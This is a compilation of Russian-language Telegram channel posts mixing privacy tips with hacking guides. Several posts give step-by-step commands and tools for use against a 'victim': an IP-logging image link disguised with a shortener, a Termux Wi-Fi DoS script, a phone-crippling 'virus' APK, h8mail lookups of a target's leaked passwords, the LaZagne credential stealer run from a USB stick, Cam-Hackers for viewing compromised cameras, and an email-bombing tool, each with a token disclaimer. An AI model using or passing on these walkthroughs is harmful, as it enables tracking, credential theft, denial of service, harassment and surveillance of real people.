​Отслеживаем IP-адрес с помощью картинки

На сегодняшний день достаточно одного перехода пользователя по ссылке с картинкой, чтобы узнать его IP-адрес и примерное местоположение компьютера. А создать подобную ссылку занимает буквально несколько кликов мышью.

Чтобы сгенерировать ссылку с трекером, нам понадобиться сайт IPlogger, любая картинка, а также сервис сокращения ссылок и онлайн хранилище файлов.

Настройка

1. Первым делом мы загружаем любую картинку на сервис для хранения фото. Например, на Google Photo или Google Drive.
2. После того, как мы загрузили фотографию в хранилище, копируем ссылку на этот файл с помощью правой кнопки мыши.
3. Открываем сайт IPlogger и вставляем ссылку в поле «URL & Image Shortener», нажимаем кнопку «Get IPLogger coge».
4.  Копируем получившуюся ссылку из поля «Your IPLogger link for collecting statistics» и переходим на сервис Bitly, чтобы замаскировать ссылку.
5.  Копируем и отправляем получившуюся ссылку будущей жертве.
6.  Открываем вкладку «Logged IP’s» на сайте IPlogger и ждем, пока пользователь перейдет по ссылке.

Когда жертва перейдет по ссылке, у нее откроется ничем не примечательная фотография. А у вас появится окно с IP-адресом и примерной геопозицией компьютера.

📌https://iplogger.org/

#хитрости #слежка

​Устраиваем DDoS атаку на Wi-Fi с телефона

DDoS — хакерская атака на вычислительную систему с целью довести её до отказа, то есть создание таких условий, при которых пользователи системы не смогут получить доступ к предоставляемым системным ресурсам (серверам), либо этот доступ будет затруднён.

Если вы имеет подключение к Wi-FI роутеру, то такую атаку можно совершить, используя Termux.

Настройка

Устанавливаем Termux

Прописываем команды в консоль:

▫️pkg upgrade
▫️pkg install python python2 git
▫️cd
▫️git clone https://github.com/artem-cell/wifi-dosser
▫️cd wifi-dosser
▫️pip2 install requests mechanize
▫️ls
▫️python2 wifi-ddoser.py

Использование

Для проведения атаки необходимо подключится к роутеру. Далее введите команду ниже.
▫️python2 wifi-ddoser.py example.com 80 3 999999999999

80 и 3 - это стандартные порты
999999999999 - это время атаки в секундах

Чтобы прекратить атаку, нужно перезагрузить роутер.

❗️Помни, вся информация предоставлена исключительно в ознакомительных целях.

#хакинг #DDoS

​Имитация другого устройства в браузере

Чтобы загрузить Web-страницу, ваш браузер посылает информацию об устройстве, с которого отправляется запрос, дабы сервер мог отдать нужную версию сайта, наиболее подходящую для вашего устройства. К сожалению, данный механизм приводит к утечке данных как о вас, так и о цифровом отпечатке вашего устройства.

Но, чтобы это прекратить, достаточно использовать расширение User-Agent с открытым исходным кодом, выдав свой браузер за другое устройство, или вовсе подменить сам браузер на любой из возможных.

Помимо преимуществ в отношении конфиденциальности, вы также можете изменять поведение сайтов, подменив свой компьютер на конкретное устройство. Например, Instagram позволяет загружать в него фотографии только в том случае, если он считает, что вы зашли с мобильного устройства, то есть вы можете загружать туда фото с нашего компьютера, если настроить User-Agent как у какого-нибудь смартфона.

📌https://add0n.com/useragent-switcher.html

Скачать расширение

Google Chrome — ссылка
Mozilla Firefox — ссылка
Opera — ссылка

#хитрости #расширения

​Временная почта на смартфоне

Работая в интернете, многие пользователи сталкиваются с необходимостью зарегистрироваться на каком-либо сайте или принять от одного из своих контактов важное сообщение. Но проблема в том, что сайты обычно требуют подтверждения реального почтового ящика, и это в итоге оборачивается для пользователя неприятными последствиями в виде спама и еще чего хуже.

Instant Email Address - временная почта для вашего смартфона. Количество адресов не ограничено. Возможность как получать, так и отправлять электронную корреспонденцию. Нужна одноразовая почта для регистрации аккаунта? В один клик. Нужно отправить письмо не используя свой основной почтовый ящик? В один клик. Скачать программу можно на канале у моего коллеги.

❗️Кстати, однозначно рекомендую читать его, если хотите носить в кармане не стукача, а правильно настроенный и защищенный инструмент. Причем инструмент с такими возможностями, о которых вы не подозреваете.

📌https://t.me/tvoijazz

#хитрости #android

​Создаем собственный вирус для телефона

Чтобы лучше понимать структуру вредоносных программ, предлагаю самостоятельно пройти процесс создания вредоноса. Нужно знать врага в лицо, так сказать.

Мы создадим собственный вирус в Termux, который заполняет всю свободную память телефона. Данный вирус практически убивает телефон, потому ни в коем случае не применяйте его против кого-либо!

Настройка

Устанавливаем Termux

1. Заходим в информацию о приложении Termux > Разрешение приложений > включаем пункт "память"

2. Прописываем команды в консоль:

▫️apt update
▫️apt upgrade
▫️pkg install git
▫️git clone https://github.com/Terror696/Vitus2.0
▫️cd Vitus2.0
▫️cp VirtualXposed.apk /sdcard/

После установки вирус появится в файлах вашего телефона.

❗️Напомню, запускать и отправлять вирус кому-то однозначно не рекомендуется!

​Шифрование и скрытие файлов в Windows

Шифрование файлов, о котором мы сегодня поговорим, работает только на операционной системе Windows, так как эта программа использует ресурсы файловой системы NTFS. Она прячет файл в папку, или в другой файл абсолютно любого расширения, а спрятанный файл не виден в ОС, его может достать только файл для дешифровки.

Для того, чтобы зашифровать файлы, нам понадобиться предустановленный Python. А затем, скачиваем CryptFiles с репозитория GitHub.

Настройка

Прописываем команду в консоль:
▫️pip install pyCrypto

Запуск

Чтобы запустить шифрование, используйте команду:
▫️python crypt.py name_folder_or_file name_file password

Чтобы расшифровать, используйте команду:
▫️python decrypt.py name_folder_or_file name_file password

Также в одну папку или файл можно зашифровать множество файлов. Эти файлы не будут видны во всей операционной системе.

📌https://github.com/AndreyKoval3000/CryptFiles

#хитрости #приватность  #windows

​Фишки Google. Как искать файл определенного типа

При поиске документов, презентаций или других файлов в Google приходиться «перелопачивать» не одну страницу, пытаясь вытащить нужный объект. К счастью, есть быстрое & простое решение.  

Оператор "filetype:" позволяет указать расширение файла, например, PDF. В указанном на картинке примере нас интересуют поиск PDF файлов, содержащие точную фразу «CODE RED».

Оператор "filetype:" позволяет указывать различные типы файлов. Вы можете также попробовать "doc", "docx", "rtf" (Word), "xls", "xlsx" (Excel), "ppt", "pptx" (PowerPoint), и "txt" (текстовые файлы). Ещё можно использовать "filetype:" для указания определённых вариантов веб-страниц, включая "html", "htm", "php", "asp" и т.д.

Нои имейте в виду, что расширение файла обычно должно указываться в URL-адресе, поэтому эти запросы не являются исчерпывающими. Так что в некоторых случаях все же придется пролистать десяток, другой страниц.

#google

​Узнаем пароли пользователя через почту

Нередко, чтобы заполучить пароль, не нужно производить взлом или дополнительные атаки на аккаунты. Дело в том, что многих пользователей сети хотя бы раз взламывали, а значит, все данные хранятся в слитых базах.

Нужно лишь найти эти базы. В этом нам поможет утилита h8mail, которая произведет поиск по Email адресу в слитых базах. Если почта где-то сливалась, то мы узнаем пароль и, возможно, IP адрес.

Настройка

Устанавливаем Termux

Прописываем команды в консоль:

▫️apt update && apt upgrade -y
▫️apt install python -y
▫️pip3 install h8mail requests  

Использование

▫️h8mail -t target@example.com

❗️Разумеется, использовать чужие пароли для каких-либо целей не стоит. А вот читать @coderedcom@coderedcom и заботиться о своей безопасности, дабы не оказаться в одной из этих баз - весьма полезно

#хакинг

​Боты для скачивания видео и аудио с YouTube

К сожалению, стандартная версия видеохостинга YouTube не позволяет скачивать видео или аудио, даже в плохом качестве. Вместо этого, разработчики предлагают ежемесячно оплачивать данную функцию. Но зачем переплачивать, если есть доступ к бесплатным Telegram-ботам?

Боты, указанные ниже, позволяют скачивать видео и даже отдельные плейлисты. У каждого есть возможность выбрать качество, которое вы хотите скачать, или же есть вариант скачать аудио из определенного видео. Это может быть полезным, если вы прослушиваете лекции, скачиваете музыку или аудиокниги.

📌@SaveYoutubeBot
📌@AudioTubeBot

#боты

​Расширения. Стираем отпечаток браузера в сети - Canvas Defender

Цифровой отпечаток — это уникальная информация о системе устройства. Например, каждый компьютер, исходя из своей мощности, версии ОС, браузера, наличия тех или иных шрифтов в системе и множества других факторов, по-разному и с разной скоростью производит рендеринг графики и анимации javascript.

Используя эту информацию, создаться отпечаток именно вашего устройства. В дальнейшем, даже после смены IP-адреса, остаётся возможность с высокой вероятностью узнать, что это тот-же самый компьютер. Так работает трекинг, который показывает рекламу, на основе информации отпечатка и действий в сети.

Canvas Defender добавляет устойчивый «шум» при посещениях сайтов, не позволяя отслеживать пользователя по отпечатку работы браузера и компьютера.

📌 Google Chrome - ссылка
📌 Mozilla Firefox - ссылка
📌 Opera - ссылка

#расширения #приватность

​Скрываем данные в аудиофайле

Самый лучший вариант спрятать какие-то данные - это воспользоваться методом стенографии. Данный способ интересен тем, что позволяет скрыть информацию в абсолютно любом файле.

Это делает передачу и хранение конфиденциальных данных значительно безопаснее, ведь чтобы узнать, в каком файле находится информация, нужно проявить настоящую смекалку, а не надеяться на сторонние утилиты. Например, чтобы скрыть информацию в аудиофайле, можно воспользоваться программой DeepSound.

К слову, данный инструмент использовал Эллиот в сериале Mr. Robot  для шифрования своего послания внутри песни, поэтому если вы хотите начать свой путь в шифровании файлов путем стенографии, то DeepSound будет для вас идеальной программой на старте.

Шифровка

1. Устанавливаем DeepSound

2. Открываем программу. Нажимаем «Open carrier files». Указываем путь к исходному аудио-файлу.

3.Нажимаем «Add secret files». Выбираем любой файл.

4. Нажимаем «Encode secret files».

Декодируем файл

Открываем программу. Добавляем аудиофайл с закодированным сообщением и видим внизу секретные файлы, которые можем извлечь кнопкой "Extract secret files"

#приватность #шифрование

​Крадем пароли с помощью стиллера

Взлом и перехват данных - процесс не из легких, а во многих случаях и невозможный вовсе. Другое дело, когда человек сам отдает все свои данные по глупости или неосторожности. Например, скачав пиратский файл, смело открывает его, запуская стиллер, который за считанные секунды ворует все данные с компьютера. Как это работает изнутри? Давайте рассмотрим подробнее.

Самый легкий и эффективный метод кражи паролей - установить стиллер на флешку. Карманный стиллер позволит красть данные у всего, что попадется под руку. Для примера будем использовать стиллер под названием LaZagne.

Чтобы запустить данный стиллер, нужно всего лишь открыть его от имени Администратора. После запуска он украдет все возможные данные и создаст текстовой документ, в котором и будут находится пароли. Стиллер крадет как пароли от всех учетных записей в браузере, так и от обычных программ.

📌Скачать LaZagne

❗️Напомню, не в коем случае не применяйте стиллер против чужих устройств!

#хакинг

​Как отключить все шпионские функции Windows 10

Все знают, как Windows, еще с момента ее появления, упрекали в сборе конфиденциальной информации о пользователях. Раньше, чтобы отключить данные функции, требовалось перерыть в ручную половину реестра. Но сегодня, это возможно сделать автоматически с помощью небольшой утилиты «O&O ShutUp10».

Данная утилита, позволяет управлять некоторыми функциями операционной системы Windows 10, с помощью которых Microsoft может отслеживать действия пользователя. Например таких, как запись действий пользователя и биометрических показателей, отправку рабочих данных системы и приложений, разнообразные уведомления, OneDrive, Центр обновления Windows, телеметрию, Защитника Windows, WiFi Sense и многое другое - всего около 50 параметров.

O&O ShutUp10 - совершенно бесплатная утилита, к тому же не требует установки. Обратите внимание на выпадающее сверху меню Actions. С помощью находящихся в нём команд вы сможете одним кликом применить несколько схем рекомендованных настроек. Кроме того, здесь же находится команда возврата всех параметров в их исходное положение, а также создания системной точки восстановления. Последней возможностью рекомендую обязательно воспользоваться.

📌https://www.oo-software.com/en/shutup10

#приватность #windows

​Запуск программ в изолированной оболочке - песочнице

Допустим, вы скачали пиратскую программу, слепо доверять «чистоте» которой - весьма наивно. Чтобы проверить, как программа поведет себя в системе, воспользуемся Sandboxie.

Sandboxie — наверное, самая популярная «песочница», позволяющая изолировать запускаемые в Windows 10, 8.1 и Windows 7 программы таким образом, чтобы они не могли повлиять на работоспособность системы.

В Sandboxie можно устанавливать и запускать любые клиентские приложения — редакторы, браузеры, игры — без воздействия на систему. Песочница контролирует доступ к файлам, дисковым устройствам, ключам реестра, процессам, драйверам, портам и другим потенциально незащищенным источникам.

В целом, для простого тестирования сторонних программ, которые у вас вызывают сомнения, параметров по умолчанию может быть достаточно, ну а продвинутые пользователи могут настроить программу под свои нужды.

📌https://github.com/sandboxie/sandboxie

#безопасность

​Расширения. Ставим пароль для браузера Google Chrome

Одним из самых простых и быстрых способов установить пароль на браузер является расширение «LockPW». Среди подобных утилит, LockWP отличается своим качеством, обширным функционалом и, конечно, русификацией.

Настройка

1. Заходим в магазин браузера и скачиваем LockPW.
2. Открывается приветственное окно, в котором мы и можем настроить работу расширения.
3. Указываем два раза будущий пароль, выбираем дополнительные настройки, и нажимаем «Сохранить».

Данное расширение блокирует браузер автоматически, после каждого закрытия. При запуске, браузер сворачивается и появляется окно с вводом пароля. Количество попыток можно указать в настройках. Если попытаться использовать браузер без ввода пароля, то он сразу же завершит свою работу.

Также, браузер можно заблокировать комбинацией клавиш «CTRL + SHIFT + L», или нажав на расширение в контекстном меню.

📌https://chrome.google.com/webstore/detail/lockpw/kjcloihghgncbdkaafgkckbokjnehfmo?hl=ru

#расширения #приватность

​Как узнать кто пользуется вашим Wi-Fi

Если вы начали замечать регулярные подвисания в своей сети, возможно, у нее появились новые, совершенно нежелательные пользователи. Самой простой способ решить проблему - поменять пароль от Wi-Fi.

Но тут есть пара нюансов. Во-перых, это не защитит сеть от повторного проникновения, во-вторых, «виновник» останется анонимным.

Как понять, что кто-то подключился к вашему роутеру? Самый простой способ – это получить статистику трафика у интернет поставщика. Даже на странице сайта провайдера есть такие данные. Другой вариант - использовать специальный софт.

Who Is On My WiFi? - это инструмент, созданный для просмотра подключений к беспроводной сети. Программа идентифицирует все устройства, которые используют данную WiFi сеть, и вы можете видеть, какие девайсы были авторизованы.

Эта программа достаточно эффективная в обнаружении любых нежелательных посетителей, так как она покажет и IP адрес и MAC адрес, а также имя устройства - это один из ее плюсов.

Использование

В использовании программа очень проста, вам нужно запустить сканирование сети, потом отметить «Желательные» подключения. А те, что вы не знаете - отметить как «Не желательные».

Готово! В дальнейшем устройства с такой пометкой не смогут подключится к вашей сети!

📌 Windows: скачать

#безопасность #wifi #windows

​Проникаем во взломанные камеры

В наше время камеры видеонаблюдения установлены абсолютно повсюду. И хотя некоторые из них защищены действительно неплохо, большая часть вообще лишена какой-либо защиты. И происходит такое потому, что сам человек подходит к защите своих устройств несерьезно, и камеры тут - не исключение.

К чему все это? Дело в том, что энтузиасты собирают и публикуют в разные утилиты целые базы со взломанными камерами. Одна из таких называется Cam-Hackers, именно с ней мы сегодня и будем работать.

Настройка

Устанавливаем Termux

Прописываем команды в консоль:

▫️apt update & apt upgrade
▫️pip2 install requests
▫️git clone https://github.com/AngelSecurityTeam/Cam-Hackers
▫️cd Cam-Hackers
▫️python3 cam-hackers.py

Использование

После запуска у вас откроется меню с огромным количеством стран. Потребуется выбрать номер интересующей вас страны. После этого появятся ссылки на взломанные камеры. Готово! Теперь город под вашим наблюдением!

#хакинг #termux

​Насколько безопасно указывать номер телефона при регистрации

Большинство администраторов сайтов наивно полагают, что один из самых безопасных вариантов регистрация пользователя на сервисе связан с задействованием номера телефона. Но так ли это на практике?

В современном обществе сложилось так, что смартфоны крепко освоились в нашей жизни. И из-за своей популярности, система Android часто подвергается хакерским атакам и взломам. К примеру, существуют вирусы удаленного доступа, которые позволяют полностью отслеживать устройство, или программы-шпионы, представляющие из себя сервер, что будет отправлять данные клиенту. Все это делает номер отнюдь не безопасным средством аутентификации.

Полагаю, многие могли заметить, как после привязки номера для регистрации, спустя какое-то время вас начинает атаковать всякого рода спам рассылка. А дело все в том, что нечестные на руку сервисы продают контактную информацию сторонним закупщикам целыми базами, а они, в свою очередь, используют номер для рекламы. Именно так и «всплывают» различные БД. И, тут как не крути, а остановить спам может только смена номера, после чего последуют проблемы с восстановлением аккаунтов, для которых этот номер был необходим.

По итогу можно сказать, что номер не является безопасным средством аутентификации. Как альтернативный вариант, советую использовать дополнительную почту для регистрации, дабы спам не захламлял основной ящик и номер телефона.

Также можно завести отдельный номер, если необходимость его привязки регулярная, а для подозрительных сайтов и сайтов, нужных лишь единожды, лучше и вовсе использовать недорогой разовый номер. Вот список проверенных ресурсов, где их можно купить.

#полезно #безопасность

​Как устроить спам на почту через телефон

Почта в открытом доступе - это не очень хорошо, если вы перешли дорогу хакеру. Помимо брутфорс атак, email может подвергаться активному спаму.

Для проведения спам атаки хакеру потребуется создать несколько email аккаунтов, чтобы обойти систему спам блока, а также установить специальную утилиту для termux. Как это происходит? Давайте посмотрим:

Настройка

Устанавливаем Termux

Прописываем команды в консоль:

▫️apt update
▫️apt upgrade
▫️apt install git
▫️apt install python
▫️git clone https://github.com/denkus24/flow
▫️cd flow

Добавляем аккаунты, которые будут производить атаку:

▫️apt install nano
▫️cd flow
▫️nano bots.fd example@gmail.com, password, example@gmail.com, password и так дальше.

Использование

▫️python flow.py

Далее нужно ввести почту, на которую будет совершена спам атака.

❗️Подобная атака может изрядно помучать жертву, особенно, если под ударом окажется корпоративная почта, необходимая для работы. Потому ни в коем случае не применяйте эти знания против других!

#хакинг #termux

​Смартфон в роли загрузочного накопителя

С приложением DriveDroid больше не нужно прибегать к помощи USB-флешек и самозагружающихся дисков, чтобы установить операционную систему или запустить ее без инсталляции.

Данный инструмент превращает смартфон в самозагружаемый накопитель, который будет запускать на подключенном компьютере любой указанный образ диска: Windows, Linux или любую другую ОС. Иными словами, у вас будет карманная операционная система, которую вы сможете запустить на любом компьютере.

Настройка

1. Первым делом, приложению нужно предоставить Root-права и выдать все разрешения, затем подключить смартфон с помощью кабеля к компьютеру.
2. DriveDroid предложит выбрать предпочтительный метод работы, нажимаем на «Standard Android».
3. Указываем, какой тип подключенного носителя вы увидели на компьютере: USB, CD-ROM или никакого.
4. Теперь остается лишь перезагрузить ПК и попробовать загрузиться со смартфона.

После успешного тестирования, можно скачать образы нужных операционных в самом приложении, с которых будет возможна загрузка. Также, можно скачать ISO-образ Windows со сторонних ресурсов. Загрузить его следует во внутреннюю память смартфона или на SD-карту, а затем выбрать его при добавлении новой ОС в DriveDroid.

📌https://4pda.ru/forum/index.php?showtopic=405264

#хитрости